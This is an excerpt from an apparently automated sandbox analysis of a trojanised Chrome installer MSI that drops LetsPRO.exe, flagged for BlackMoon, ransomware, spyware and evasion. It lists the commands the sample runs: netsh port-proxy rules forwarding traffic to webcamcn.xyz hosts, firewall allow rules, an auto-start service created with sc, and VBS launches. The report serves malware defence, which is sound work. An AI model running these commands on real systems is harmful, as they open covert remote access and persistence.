                  Source: 18.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winMSI@78/175@1/2
                  Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00013040 GetLastError,SetLastError,FormatMessageW,GetLastError,SetLastError,LocalFree
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F37B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F37740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA0A17 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F36C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCAA847 OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCAA4FF OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F36050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F36150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW
                  Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00012005 FindResourceW,LoadResource,LockResource,CreateFileW,SizeofResource,SetFilePointerEx,CloseHandle
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCAA42F OpenSCManagerW,GetLastError,OpenServiceW,ChangeServiceConfigW,GetLastError,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCAA005 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA9F60 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CMLB5E7.tmp
                  Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7824:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\GS-1-5-21-2246122658-3693405117-2476756634-1003{D19BAF17-7C87-467E-8D63-6C4B1C836373}
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Mutant created: \Sessions\1\BaseNamedObjects\2024. 4.21
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Mutant created: \Sessions\1\BaseNamedObjects\2024. 4.23
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\G{A9A86B93-B54E-4570-BE89-42418507707B}
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF983CA76AAB82BF40.TMP
                  Source: unknown Process created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
                  Source: C:\Program Files (x86)\ChromeSetup.exe Command line argument: kernel32.dll 16_2_0001260C
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Command line argument: kernel32.dll 30_2_00126898
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Command line argument: DllEntry 30_2_00126898
                  Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: GoogleUpdate.exe String found in binary or memory: Application update/install
                  Source: GoogleUpdate.exe String found in binary or memory: https://www.google.com/support/installer/?
                  Source: GoogleUpdate.exe String found in binary or memory: /installerdata=
                  Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sutup-Chrome.13.26.x64.msi"
                  Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F88407A7EB4CD1FAACECE5C8A82A6774
                  Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: unknown Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\ChromeSetup.exe "C:\Program Files (x86)\ChromeSetup.exe"
                  Source: C:\Program Files (x86)\ChromeSetup.exe Process created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: unknown Process created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
                  Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c cscript C:\Users\user\99944\144977.vbs
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
                  Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe cscript C:\Users\user\99944\144977.vbs
                  Source: unknown Process created: C:\Windows\System32\sc.exe sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144
                  Source: unknown Process created: C:\Windows\System32\netsh.exe netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
                  Source: unknown Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: unknown Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
                  Source: unknown Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
                  Source: unknown Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
                  Source: unknown Process created: C:\Windows\System32\netsh.exe netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
                  Source: unknown Process created: C:\Windows\System32\taskkill.exe taskkill /f /t /im wegame.exe
                  Source: unknown Process created: C:\Windows\System32\taskkill.exe taskkill /f /t /im WeGame.exe
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: dinput8.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: inputhost.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: devenum.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msdmo.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wldp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: netapi32.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: version.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: userenv.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: msimg32.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wininet.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wkscli.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: netutils.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: mdmregistration.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: omadmapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dmcmnutils.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: iri.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dsreg.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: profapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: cscapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dbgcore.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dbgcore.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: msxml3.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: atlthunk.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wintypes.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wintypes.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wintypes.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: textshaping.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: webio.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: mswsock.dll
